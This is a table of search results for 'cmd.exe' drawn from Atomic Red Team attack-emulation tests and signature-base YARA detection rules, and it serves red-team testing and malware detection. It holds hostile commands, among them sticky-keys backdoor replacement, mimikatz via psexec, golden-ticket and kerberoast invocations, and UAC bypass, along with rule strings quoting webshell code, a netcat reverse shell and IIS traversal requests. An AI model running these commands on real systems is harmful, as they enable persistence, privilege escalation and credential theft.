| atomic-red-team | T1112.md | cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.002.md | This Action will query all processes and list the process name and owner.It will then make a copy of an existing token to create a new instance of cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.002.md | $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,”cmd.exe”) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ a = Shell("cmd.exe /c choice /C Y /N /D Y /T 3”, vbNormalFocus)” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n a = Shell(“cmd.exe /c wscript.exe //E:jscript #{jse_path}", vbNormalFocus)n” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1207.md | $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList “/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1216.md | set comspec=%windir%\System32\cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.003.md | Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1543.003.md | Upon successful execution, powershell will download AtomicService.exe from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Change Default File Association From cmd.exe of hta to notepad. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.002.md | | input_binary | Executable binary to use in place of screensaver for persistence | Path | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with “cmd.exe” (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | Replace sticky keys binary (sethc.exe) with cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures “cmd.exe,” or another program that provides backdoor access, as a “debugger” for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the “debugger” program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | | payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.001.md | Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.004.md | Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.004.md | | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | $ShortCut.TargetPath=”cmd.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | | executable_binary | Binary to execute with UAC Bypass | Path | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | cmd.exe /c eventvwr.msc | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1558.001.md | cmd.exe /c “#{local_folder}#{local_executable}” golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden | MIT License. © 2018 Red Canary |
| atomic-red-team | T1558.003.md | cmd.exe /c “#{local_folder}#{local_executable}” kerberoast #{flags} /outfile:”#{local_folder}#{out_file}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1558.004.md | cmd.exe /c “#{local_folder}#{local_executable}” asreproast /outfile:”#{local_folder}#{out_file}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | {DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } | MIT License. © 2018 Red Canary |
| atomic-red-team | T1559.002.md | 9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | if ((cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.001.md | if(cmd.exe /c “where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul”) { C:\Windows\Sysmon.exe -accepteula -i } else | MIT License. © 2018 Red Canary |
| atomic-red-team | T1563.002.md | sc.exe create sesshijack binpath= “cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | | payload_path | Path of file to hide in ADS | Path | c:\windows\system32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1569.002.md | Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file art-marker.txt |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.011.md | | malicious_service_path | malicious service path | String | %windir%\system32\cmd.exe| | MIT License. © 2018 Red Canary |
| signature-base | apt_apt15.yar | $ = “Cmd.Exe” wide | CC BY-NC 4.0 |
| signature-base | apt_apt27_hyperbro.yar | $s1 = “\cmd.exe /A” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_apt29_nobelium_may21.yar | $s2 = “cmd.exe /c start BOOM.exe” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_apt34.yar | $x1 = “WshShell.run "cmd.exe /C C:\ProgramData\” ascii | CC BY-NC 4.0 |
| signature-base | apt_apt34.yar | $x3 = “cmd.exe /C certutil -f -decode C:\ProgramData\” ascii | CC BY-NC 4.0 |
| signature-base | apt_apt3_bemstour.yar | $cmdline_3 = “cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_blackenergy.yar | $s0 = “system32\cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_casper.yar | $a0 = “cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST” | CC BY-NC 4.0 |
| signature-base | apt_cn_pp_zerot.yar | $x1 = “%s\cmd.exe /c %s\Zlh.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $s0 = “cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $x1 = “cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_dnspionage.yar | $s2 = “CMD.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_dustman.yar | $s1 = “C:\windows\system32\cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_emissary.yar | $s1 = “cmd.exe /c %s > %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_freemilk.yar | $s1 = “CMD.EXE /C "%s"” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_glassRAT.yar | $s1 = “cmd.exe /c %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_glassRAT.yar | $s7 = “cmd.exe /c erase /F "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $s1 = “cmd.exe /c systeminfo “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $s4 = “cmd.exe /c tasklist “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_hafnium_log_sigs.yar | $x1 = “cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_hafnium_log_sigs.yar | $x2 = “cmd.exe /c cd /d C:\inetpub\wwwroot\aspnet_client” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_hellsing_kaspersky.yar | $cmd = “cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f "%s"” | CC BY-NC 4.0 |
| signature-base | apt_hellsing_kaspersky.yar | $a2 = “system32\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_hellsing_kaspersky.yar | $a10 = “%SystemRoot%\system32\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_irontiger.yar | $s3 = “C:\Windows\System32\cmd.exe /C schtasks /create /tn "\Microsoft\Windows\PLA\System\Microsoft Windows" /tr “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_irontiger.yar | $s4 = “C:\Windows\System32\cmd.exe /C schtasks /create /tn "Microsoft Windows" /tr “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keyboys.yar | $s9 = “%s\cmd.exe /c "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keyboys.yar | $s1 = “cmd.exe /c "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keylogger_cn.yar | $s1 = “\cmd.exe /c "systeminfo.exe » “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keylogger_cn.yar | $s2 = “%s\cmd.exe /c %s » "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_laudanum_webshells.yar | $s1 = “Executable: <Input type="text" name="cmd" value="cmd.exe"> ” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base | apt_lazarus_aug20.yar | $str_mask_1 = “cmd.exe /c "%s » %s 2>&1"” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_lazarus_aug20.yar | $str_mask_2 = “cmd.exe /c "%s 2» %s"” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_lazarus_dec17.yar | $x7 = “$cmdResult = cmd.exe /c $cmdInst | Out-String;” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_monsoon.yar | $s1 = “cmd.exe /c start “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_naikon.yar | $s12 = “\cmd.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_nk_gen.yar | $s1 = “%s\cmd.exe /c %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $a2 = “cmd.exe /c “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $two3 = “vbs = "cmd.exe /c SchTasks” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_oilrig_oct17.yar | $s3 = “C:\windows\system32\cmd.exe /c (“ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_olympic_destroyer.yar | $x1 = “cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\evtchk.txt” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_olympic_destroyer.yar | $x2 = “cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^)” wide | CC BY-NC 4.0 |
| signature-base | apt_op_cloudhopper.yar | $x1 = “strNetUse = "cmd.exe /c net use \\" & host” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_op_cloudhopper.yar | $x2 = “localcmd = "cmd.exe /c " & command “ ascii | CC BY-NC 4.0 |
| signature-base | apt_op_cloudhopper.yar | $x4 = “strExec = "cmd.exe /c " & cmd & " » " & resultfile & " 2>&1" ‘2>&1 err” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_passcv.yar | $s1 = “cmd.exe /c MD “ fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s0 = “ |
CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s1 = “ |
CC BY-NC 4.0 |
| signature-base | apt_poseidon_group.yar | $s1 = “c:\winnt\system32\cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_poseidon_group.yar | $s2 = “c:\windows\system32\cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_ruag.yar | $s3 = “exe = cmd.exe” ascii | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str01 = “cmd.exe /c ping 127.0.0.1 & del "%s"” | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str02 = “cmd.exe /c rundll32 "%s" Play "%s"” | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str04 = “cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c "%s"” | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str08 = “cmd.exe /c rundll32 "%s" ActiveQvaw "%s"” | CC BY-NC 4.0 |
| signature-base | apt_scarcruft.yar | $x2 = “cmd.exe /C ping 0.1.1.2” wide | CC BY-NC 4.0 |
| signature-base | apt_shellcrew_streamex.yar | $x1 = “cmd.exe /c "%s"” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_snowglobe_babar.yar | $x5 = “cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_sofacy_xtunnel_bundestag.yar | $x3 = “C:\Windows\System32\cmd.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_suckfly.yar | $s1 = “cmd.exe /c %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_ta17_293A.yar | $x2 = “0x00000002, "C:\Windows\System32\cmd.exe", "",” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_ta17_318B.yar | $s3 = “cmd.exe /c %s > %s 2>&1” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_ta18_149A.yar | $x1 = “cmd.exe /q /c net share adnim$” ascii | CC BY-NC 4.0 |
| signature-base | apt_telebots.yar | $s1 = “cmd = "cmd.exe /c " + arg + " >" + outfile +" 2>&1"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_telebots.yar | $s1 = “cmd = "cmd.exe /c " + arg + " " + arg2” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_terracotta.yar | $s0 = “cmd.exe /q /c "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_threatgroup_3390.yar | $x1 = “1001=cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_thrip.yar | $s3 = “C:\WINDOWS\system32\cmd.exe” fullword ascii /* Goodware String - occured 2 times */ | CC BY-NC 4.0 |
| signature-base | apt_thrip.yar | $s1 = “C:\Windows\SysNative\cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_thrip.yar | $x1 = “$.oS.Run(‘cmd.exe /c ‘+a+’” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_thrip.yar | $s1 = “pGlobal->nOSType==64–%s\cmd.exe %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_thrip.yar | $s1 = “%s\cmd.exe /c %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_turla.yar | $x1 = “sc %s create %s binPath= "cmd.exe /c start %%SystemRoot%%\%s"»%s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_turla.yar | $x2 = “cmd.exe /c start %%SystemRoot%%\%s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_turla.yar | $x3 = “cmd.exe /c %s\%s -s %s:%s:%s -c "%s %s /wait 1"»%s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_ua_hermetic_wiper.yar | $sa3 = “cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_winnti.yar | $a7 = “cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_winnti.yar | $a11 = “\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_winnti_burning_umbrella.yar | $x1 = “cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_zxshell.yar | $x1 = “CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++” ascii | CC BY-NC 4.0 |
| signature-base | apt_zxshell.yar | $x5 = “ping 127.0.0.1 -n 7&cmd.exe /c net start %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_zxshell.yar | $x6 = “ZXNC -e cmd.exe x.x.x.x” fullword ascii | CC BY-NC 4.0 |
| signature-base | cn_pentestset_scripts.yar | $s2 = “if ShellPath="" Then ShellPath = "c:\\windows\\system32\\cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s5 = “cmd.exe” fullword ascii /* PEStudio Blacklist: strings / / Goodware String - occured 120 times */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s3 = “SETP c:\windows\system32\cmd.exe “ fullword wide /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s1 = “Usage : ms11-080.exe cmd.exe Command “ fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s1 = “/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe” fullword wide /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s2 = “msadc/..\..\..\..\winnt/system32/cmd.exe” fullword wide /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_tools.yar | $s1 = “C:\WINDOWS\system32\cmd.exe” fullword wide /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s1 = “<cfexecute name="cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s1 = “if shellpath="" then shellpath = "cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s0 = “response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s0 = “<cfexecute name="C:\Winnt\System32\cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s2 = “if ShellPath="" Then ShellPath = "cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s0 = “fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."\r\n");” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s16 = “If LCase(appName) = "cmd.exe" And appArgs <> "" Then” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s10 = “if (cmd == null) cmd = "cmd.exe /c set";” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s11 = “if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt” ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s1 = “Str[17] = "select shell(‘c:\windows\system32\cmd.exe /c net user b4che10r ab” ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s1 = “<cfexecute name="C:\Winnt\System32\cmd.exe"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s1 = “If jzgm=""Then jzgm="cmd.exe /c net user"” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | crime_cn_campaign_njrat.yar | $x1 = “cmd.exe /c ping 0 -n 2 & del "” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_cn_campaign_njrat.yar | $a1 = “taskkill /f /im cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_fireball.yar | $s1 = “cmd.exe /c MD “ fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_fireball.yar | $s1 = “C:\Windows\System32\cmd.exe /c ""” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_nansh0u.yar | $s1 = “taskkill /im cmd.exe /f” fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_ransom_robinhood.yar | $s3 = “cmd.exe /c net use * /DELETE /Y” ascii | CC BY-NC 4.0 |
| signature-base | crime_wannacry.yar | $s3 = “cmd.exe /c "%s"” fullword ascii | CC BY-NC 4.0 |
| signature-base | exploit_cve_2014_4076.yar | $x1 = “[+] Created a new cmd.exe process” fullword ascii | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_8759.yar | $x1 = “Error = Process.Create("powershell -nop cmd.exe /c” fullword ascii | CC BY-NC 4.0 |
| signature-base | exploit_uac_elevators.yar | $s1 = “\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | exploit_uac_elevators.yar | $s1 = “%systemroot%\system32\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | exploit_uac_elevators.yar | description = “Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe” | CC BY-NC 4.0 |
| signature-base | exploit_uac_elevators.yar | $g1 = “%systemroot%\system32\cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktools.yar | $s1 = “Usage : ms11-080.exe cmd.exe Command “ fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s4 = “program = "cmd.exe /c net start > " + SHELL_DIR” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s5 = “: "c:\\windows\\system32\\cmd.exe")” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s1 = “if ShellPath="" Then ShellPath = "cmd.exe"” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s1 = “program = "cmd.exe /c net start > " + SHELL_DIR” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s3 = “<option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s4 = “cmd = "cmd.exe /c set";” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s1 = “cmd=chr(34)&"cmd.exe /c "&request.form("cmd")&" > 8617.tmp"&chr(34)” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s0 = “Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_crimson_rat.yar | $x3 = “cmd.exe/c systeminfo » 1.txt” fullword wide | CC BY-NC 4.0 |
| signature-base | gen_fireeye_redteam_tools.yar | $s5 = /self.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase | CC BY-NC 4.0 |
| signature-base | gen_khepri.yar | $sa2 = “cmd.exe /c “ | CC BY-NC 4.0 |
| signature-base | gen_malware_set_qa.yar | $s1 = “cmd.exe /c ping 0 -n 2 & del "” fullword wide | CC BY-NC 4.0 |
| signature-base | gen_mal_link.yar | $c1 = “C:\Windows\System32\cmd.exe” ascii wide | CC BY-NC 4.0 |
| signature-base | gen_mal_link.yar | $s1 = “cmd.exe /” ascii wide nocase | CC BY-NC 4.0 |
| signature-base | gen_p0wnshell.yar | $x5 = “FileName = "cmd.exe",” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_p0wnshell.yar | $x3 = “-CreateProcess "cmd.exe" -Username "nt authority\system"” fullword wide | CC BY-NC 4.0 |
| signature-base | gen_rats_malwareconfig.yar | $s7 = “cmd.exe /c rundll32 "%s"” | CC BY-NC 4.0 |
| signature-base | gen_rats_malwareconfig.yar | $v1 = “cmd.exe /k ping 0 & del” wide | CC BY-NC 4.0 |
| signature-base | gen_rats_malwareconfig.yar | $v2 = “cmd.exe /c ping 127.0.0.1 & del” wide | CC BY-NC 4.0 |
| signature-base | gen_rats_malwareconfig.yar | $v3 = “cmd.exe /c ping 0 -n 2 & del” wide | CC BY-NC 4.0 |
| signature-base | gen_redmimicry.yar | $cmd0 = “C:\Windows\System32\cmd.exe” ascii fullword | CC BY-NC 4.0 |
| signature-base | gen_rottenpotato.yar | $s1 = “"C:\Windows\System32\cmd.exe" /K start” fullword wide | CC BY-NC 4.0 |
| signature-base | gen_sharpcat.yar | $s2 = “C:\Windows\System32\cmd.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | gen_suspicious_strings.yar | $s3 = “cmd.exe /C script:http://” ascii nocase | CC BY-NC 4.0 |
| signature-base | gen_suspicious_strings.yar | $s4 = “cmd.exe /C script:https://” ascii nocase | CC BY-NC 4.0 |
| signature-base | gen_susp_lnk_files.yar | $command = “C:\Windows\System32\cmd.exe” fullword ascii //cmd is precursor to findstr | CC BY-NC 4.0 |
| signature-base | gen_susp_obfuscation.yar | reference = “https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/” | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $gen_bit_sus11 = “"cmd.exe” nocase | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | // execute cmd.exe /c with arguments using ProcessStartInfo | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $susasp4 = “cmd.exe” | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $asp_gen_sus11 = “"cmd.exe” nocase | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $sus2 = “cmd.exe” fullword wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $exec_shell1 = “cmd.exe” nocase wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $sus5 = “cmd.exe” fullword wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $fp1 = “command = "cmd.exe /c set";” | CC BY-NC 4.0 |
| signature-base | gen_winshells.yar | $s1 = “cmd - execute cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_winshells.yar | $s1 = “[ executing cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | mal_ransom_lorenz.yar | $x1 = “process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON “ ascii fullword | CC BY-NC 4.0 |
| signature-base | mal_ransom_lorenz.yar | $s1 = “process call create "cmd.exe /c schtasks /Create /F “ ascii fullword | CC BY-NC 4.0 |
| signature-base | spy_regin_fiveeyes.yar | $a6=”cmd.exe” wide | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s4 = “GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0” | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | description = “ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset” | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s8 = “a.WriteLine ("cmd.exe")” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s1 = “cmd.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s8 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s9 = “/scripts/..%c1%1c../winnt/system32/cmd.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s1 = “\cmd.exe" /k wusa c:\users\” ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $x6 = “Trying to map C:\windows\system32\cmd.exe into current process” fullword wide | CC BY-NC 4.0 |
